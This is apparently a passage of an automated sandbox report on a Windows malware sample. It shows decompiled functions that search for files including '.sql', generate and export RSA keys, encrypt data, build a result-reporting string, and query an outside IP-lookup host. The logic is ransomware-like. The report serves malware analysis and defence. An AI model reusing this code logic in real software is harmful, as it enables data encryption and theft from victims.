												_t15 = _t67 + 1; // 0x1
												_v12 = E00406440(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 004064B2
lstrcatW.KERNEL32(00000000,00410364), ref: 004064C4
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004064D2
lstrcmpW.KERNEL32(?,00410368,?,?), ref: 004064FC
lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406512
lstrcatW.KERNEL32(00000000,?), ref: 00406524
lstrlenW.KERNEL32(00000000,?,?), ref: 0040652B
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0040655A
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00406571
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0040657C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0040659A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 004065AF
lstrlenA.KERNEL32(*******************,?,?), ref: 004065CE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004065E9
CloseHandle.KERNEL32(00000000,?,?), ref: 004065F3
FindNextFileW.KERNEL32(?,?,?,?), ref: 0040661C
FindClose.KERNEL32(?,?,?), ref: 0040662D

Strings

*******************, xrefs: 004065B9, 004065C9
.sql, xrefs: 00406554

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: 05c8e46b5a6b324242753d00ddfa767ad3d4e90b023ac9ffc8302244919f4615
Instruction ID: d8231c9366fa09183c7f9a28845eb84a492a5b8a9a6307543842452b5fb504c9
Opcode Fuzzy Hash: 05c8e46b5a6b324242753d00ddfa767ad3d4e90b023ac9ffc8302244919f4615
Instruction Fuzzy Hash: 24419271601219ABEB209B609D48FAB77BCEF44704F11447AF902F6191EB799E50CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00405540 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00405540(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				BYTE* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				char _v22;
				short _v24;
				short _v28;
				char _v36;
				char _v180;
				char _v435;
				char _v436;
				WCHAR* _t40;
				signed int _t48;
				int _t60;
				void* _t61;
				char _t68;
				CHAR* _t71;
				void* _t74;
				short _t79;
				short _t80;
				char _t81;
				BYTE* _t84;
				WCHAR* _t92;
				signed int _t93;
				char* _t95;
				void* _t96;
				int _t98;
				long _t99;
				void* _t100;

				_t74 = __ecx;
				_t96 = __edx;
				_v12 = __ecx;
				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v16 = _t40;
				if(_t40 == 0) {
					_t92 = 0;
					_t71 = 0;
				} else {
					_t3 =  &(_t40[0x400]); // 0x800
					_t71 = _t3;
					_t92 = _t40;
				}
				_push(_t96);
				_v8 = _t92;
				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				E004039B0( &_v180);
				E00406D90( &_v180);
				E00406BA0( &_v180);
				E004069A0( &_v180,  &(_t92[lstrlenW(_t92)]));
				_t48 = lstrlenW(_t92);
				_t79 = "#shasj"; // 0x61687323
				_t93 = _t48;
				asm("movq xmm0, [0x410128]");
				_v28 = _t79;
				_t80 =  *0x410134; // 0x6a73
				_v24 = _t80;
				_t81 =  *0x410136; // 0x0
				asm("movq [ebp-0x20], xmm0");
				_v22 = _t81;
				_v436 = 0;
				E00408B30( &_v435, 0, 0xff);
				E00405C40( &_v436,  &_v36, lstrlenA( &_v36));
				_t98 = _t93 + _t93;
				E00405CF0( &_v436, _v8, _t98);
				_v20 = _t93 * 8;
				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
					GetLastError();
				}
				_t29 = lstrlenA(_t71) + 4; // 0x4
				_t99 = _t29;
				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
				_t60 = lstrlenA(_t71);
				_t84 = _v12;
				_t61 = _t60 + 2;
				if(_t84 == 0) {
					L7:
					_v8 = 0;
				} else {
					_v8 = _t84;
					if(_t61 >= _t99) {
						goto L7;
					}
				}
				_t100 = 0;
				if(lstrlenA(_t71) != 0) {
					_t95 = _v8;
					do {
						_t68 =  *((intOrPtr*)(_t100 + _t71));
						if(_t68 != 0xa && _t68 != 0xd) {
							 *_t95 = _t68;
							_t95 = _t95 + 1;
						}
						_t100 = _t100 + 1;
					} while (_t100 < lstrlenA(_t71));
				}
				E00405370(_v8, 0, 0);
				_t73 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E00407720( &_v180);
				VirtualFree(_v16, 0, 0x8000);
				_t67 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0040555F
wsprintfW.USER32 ref: 0040558D
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 004055DC
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 004055EE
_memset.LIBCMT ref: 00405631
lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0040563D
CryptBinaryToStringA.CRYPT32(?,74CB69A0,40000001,00000000,00000000), ref: 00405682
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0040568C
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 00405699
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 004056A8
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056B2
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056CF
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056E8
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00405720
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00405737

Strings

#shasj, xrefs: 004055F0
action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 00405587

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
API String ID: 2994799111-4131875188
Opcode ID: 211b1dd28046743099e46c1b0964984f10231aaafabe4b274e23aab69b3c652f
Instruction ID: 65ff7d96991e722c176764c3897e6b24fa244fe7beac740f882282c65e832afb
Opcode Fuzzy Hash: 211b1dd28046743099e46c1b0964984f10231aaafabe4b274e23aab69b3c652f
Instruction Fuzzy Hash: B4519F71A00219AAEB20AB65DD46FEF7B79EF44704F100079E605B62D1DB746E04CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406000 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00406000(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, char _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0x412ae8);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						_t12 =  &_v28; // 0x403724
						__imp__CryptGetKeyParam(_v12, 8, _t12, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t16 =  &_a20; // 0x403724
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16,  *_t16);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E004034F0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0x412ae8);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

APIs

EnterCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000,00000000,?,00000800), ref: 0040600B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00403724,00000000,00000000,00000000), ref: 0040602E
GetLastError.KERNEL32(?,00403724,00000000,00000000,00000000), ref: 00406038
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00403724,00000000,00000000,00000000), ref: 00406054
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00403724,00000000,00000000), ref: 00406089
CryptGetKeyParam.ADVAPI32(00000000,00000008,$7@,0000000A,00000000,?,00403724,00000000), ref: 004060AA
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,$7@,?,00403724,00000000), ref: 004060D2
GetLastError.KERNEL32(?,00403724,00000000), ref: 004060DB
CryptReleaseContext.ADVAPI32(00000000,00000000,?,00403724,00000000,00000000), ref: 004060F8
LeaveCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000), ref: 00406103

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00406023, 00406049
$7@, xrefs: 004060BC, 004060BF
$7@, xrefs: 004060A0, 004060A3

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: $7@$$7@$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-2376705498
Opcode ID: 8206897a1cfa35837b8722e43d42d1a1e9784adc6c633a5bd71464a07145b1f5
Instruction ID: f2ae4c90db2c5b8a25dd032e9c4ad046e7fd1e3aad681ca681e37570fcd3149a
Opcode Fuzzy Hash: 8206897a1cfa35837b8722e43d42d1a1e9784adc6c633a5bd71464a07145b1f5
Instruction Fuzzy Hash: 84314F74A40308BFDB10CFA0DD45FAF77B8AB48700F108029F602BA2D0D7B99A50DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00407C60 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00407C60(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000);
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t64 = VirtualAlloc(0, _t55, 0x3000, 0x40);
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						goto L15;
					}
				}
			}

0x00407c70
0x00407c72
0x00407c77
0x00407c7a
0x00407c7d
0x00407c85
0x00407d79
0x00407d81
0x00407c8b
0x00407c8b
0x00407c90
0x00407c90
0x00407c93
0x00407c98
0x00407c99
0x00407ca5
0x00407ca5
0x00407cb1
0x00407cb5
0x00407d87
0x00407d95
0x00407da3
0x00407cc3
0x00407cc6
0x00407cce
0x00407cd5
0x00407cdc
0x00407ce2
0x00407ce6
0x00407ced
0x00407cf4
0x00407cfb
0x00407cff
0x00407d07
0x00407d17
0x00407d17
0x00407d1c
0x00407d24
0x00000000
0x00407d26
0x00407d26
0x00407d27
0x00407d28
0x00407d2f
0x00000000
0x00407d31
0x00407d31
0x00407d35
0x00407d37
0x00407d3a
0x00407d41
0x00407d45
0x00407d4e
0x00407d52
0x00407d53
0x00407d41
0x00407d57
0x00407d57
0x00407d2f
0x00407d09
0x00407d09
0x00407d0d
0x00407d15
0x00407d5e
0x00407d5e
0x00000000
0x00000000
0x00000000
0x00407d15
0x00407d65
0x00407d73
0x00000000
0x00407d73
0x00407cb5

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
GetModuleHandleA.KERNEL32(?), ref: 00407CFF
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D73
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D87
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D95

Strings

CryptGenRandomAdvapi32.dll, xrefs: 00407D17, 00407D1A
Advapi32.dll, xrefs: 00407D09, 00407D0C

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: 0458a47c7d0f6a737997e540b1eda647f42b02ba3f55a885d4cf6adcdbbaa127
Instruction ID: 199b4cbb89f92d6933ab86ad2097cfc69592b150d2405189e4f4276a6cc67689
Opcode Fuzzy Hash: 0458a47c7d0f6a737997e540b1eda647f42b02ba3f55a885d4cf6adcdbbaa127
Instruction Fuzzy Hash: 8931F871E04209ABEB109FE4DD49BEEBB78EF44700F204079E505B62A1E775AE01CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00407DB0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00407DB0(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						goto L10;
					}
				}
			}

0x00407dc0
0x00407dc2
0x00407dc7
0x00407dcd
0x00407dd0
0x00407dd8
0x00407ea2
0x00407eaa
0x00407dde
0x00407dde
0x00407de0
0x00407de0
0x00407de3
0x00407de7
0x00407de8
0x00407df4
0x00407dfe
0x00407e02
0x00407eb0
0x00407ebe
0x00407ecc
0x00407e11
0x00407e14
0x00407e1c
0x00407e23
0x00407e2a
0x00407e30
0x00407e34
0x00407e3b
0x00407e42
0x00407e49
0x00407e4d
0x00407e55
0x00407e65
0x00407e65
0x00407e6a
0x00407e72
0x00407e7d
0x00407e86
0x00407e86
0x00407e57
0x00407e57
0x00407e5b
0x00407e63
0x00000000
0x00000000
0x00407e63
0x00407e8e
0x00407e9c
0x00000000
0x00407e9c
0x00407e02

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,74CB66A0,00000000), ref: 00407DD0
VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 00407DF8
GetModuleHandleA.KERNEL32(?), ref: 00407E4D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407E5B
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407E6A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407E8E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407E9C
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EB0
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EBE

Strings

CryptGenRandomAdvapi32.dll, xrefs: 00407E65, 00407E68
Advapi32.dll, xrefs: 00407E57, 00407E5A

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: ecf7433da154a3d3e4de08d5f3ff40864c9027ea2fbed6340348b44d82ee8ddf
Instruction ID: be5cfa20fe97609e74d06931db444e7d7e20eeaeedb8336480d1c404223e93be
Opcode Fuzzy Hash: ecf7433da154a3d3e4de08d5f3ff40864c9027ea2fbed6340348b44d82ee8ddf
Instruction Fuzzy Hash: FA318471E05209AFEB109FA5DD49BEEBB78EF44701F104079E605B6291D774AE00CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00405D80 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00405D80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12);
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16);
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10);
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

APIs

CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00404916,?,0040491E), ref: 00405D95
GetLastError.KERNEL32(?,0040491E), ref: 00405D9F
CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0040491E), ref: 00405DBB
CryptGenKey.ADVAPI32(0040491E,0000A400,08000001,?,?,0040491E), ref: 00405DE7
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 00405E0B
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 00405E23
CryptDestroyKey.ADVAPI32(?), ref: 00405E2D
CryptReleaseContext.ADVAPI32(0040491E,00000000), ref: 00405E39
CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 00405E4E

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00405D8A, 00405DB0, 00405E43

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: 4ea6af53a05bc539ebf2c4aac83e9110a57bf35b6da581c5ea0214b087b6d0db
Instruction ID: a5e1c5bc4adb18f4c6cf36d0885f5ae2a65a9070c6c01f648420f3db759758e1
Opcode Fuzzy Hash: 4ea6af53a05bc539ebf2c4aac83e9110a57bf35b6da581c5ea0214b087b6d0db
Instruction Fuzzy Hash: FD216A75790308BBEB20CBA0DE4AF9B7779AB88B01F104425F701BA1D0C6B99940DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004068F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 004077F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
Part of subcall function 004077F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED

VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0040690F
lstrlenW.KERNEL32(004103AC), ref: 0040691C

Part of subcall function 00407A00: InternetCloseHandle.WININET(?), ref: 00407A13
Part of subcall function 00407A00: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00407A32

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,004103B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 0040694B
wsprintfW.USER32 ref: 00406963
VirtualFree.KERNEL32(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,004103B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 00406979
InternetCloseHandle.WININET(?), ref: 00406987

Strings

ipv4bot.whatismyipaddress.com, xrefs: 0040693C
GET, xrefs: 00406924

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
